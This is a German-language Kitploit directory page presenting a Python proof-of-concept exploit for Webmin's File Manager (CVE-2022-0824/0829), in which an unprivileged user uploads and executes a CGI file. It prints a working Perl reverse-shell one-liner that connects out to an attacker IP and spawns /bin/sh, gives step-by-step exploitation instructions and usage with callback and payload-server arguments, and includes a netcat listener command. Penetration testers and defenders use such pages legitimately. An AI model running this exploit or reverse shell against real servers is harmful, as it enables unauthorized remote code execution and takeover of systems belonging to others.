Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
WebminRCE-exploit — CVE-2022-0824, CVE-2022-0829, Dateimanager-Privilegienexploit | Kitploit
Tools/GitHubGitHub/gokul-ramesh/webminrce-exploit
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubgokul-ramesh/webminrce-exploit

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829, Dateimanager-Privilegienexploit

Repository anzeigen
vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829 - File Manger Privilegienausnutzung

Die anfällige Anwendung zum Testen dieses PoC kann hier als Docker-Image gefunden werden.
Voraussetzungen:

  • Python3
  • Requests-Modul

Beschreibung

Sicherheitslücke

Unangemessene Zugriffskontrolle führt zu Remote Code Execution Sichere Benutzer (unprivilegierte Benutzer) können auf das File Manager-Modul zugreifen, das standardmäßig eingeschränkt sein sollte.

Exploit-Payload

Verwenden Sie die Sicherheitslücke der unangemessenen Zugriffskontrolle, um eine CGI-Datei auf den Webmin-Server hochzuladen.

Schritt 1 (Authentifizierung)

Authentifizieren und melden Sie sich mit einem sicheren/weniger privilegierten Benutzer am Server an.

Schritt 2 (Datei auf Server herunterladen)

Nutzen Sie das anfällige File Manager-Modul (/file-manager/http_download.cgi), um ein Perl-Skript auf den Server herunterzuladen.
Perl-Skript, um einen Reverse-Shell-Zugriff zu erhalten:
root@kitploit:~
perl -e 'use Socket;$i="0.0.0.0";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Schritt 3 (Berechtigung ändern)

Fügen Sie der Datei (/file-manager/chmod.cgi) eine ausführbare Berechtigung hinzu.

Schritt 4 (Befehl ausführen)

Rufen Sie einfach die hochgeladene Datei auf, um das darin enthaltene Reverse-Shell-Skript auszuführen.

Verwendungsanleitung :

root@kitploit:~
  $ python3 cve-2022-0824.py --help
  
  usage: cve-2022-0824.py [-h] --host HOST --user USER --password PASSWORD
                        --Python_server PYTHON_SERVER --callback_url
                        CALLBACK_URL [--proxy PROXY]

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           Host url(complete)
  --user USER           Username
  --password PASSWORD   Password
  --Python_server PYTHON_SERVER
                        Python httpServer with port
  --callback_url CALLBACK_URL
                        Callback ip and port
  --proxy PROXY         Proxy details

Anwendungsbeispiel:

root@kitploit:~
$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password[Password] --Python_server [Filehosting Server Information] ----callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]
root@kitploit:~
$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080

Benutzername und Passwort sind für sichere Benutzer (nicht privilegiert) Richten Sie vor dem Ausführen des Skripts einen Listener ein, um eine Reverse-Shell-Verbindung zu erhalten.

root@kitploit:~
$ nc -lvp <port>

Dank an @faisalfs10x für den Exploit.

Tool herunterladen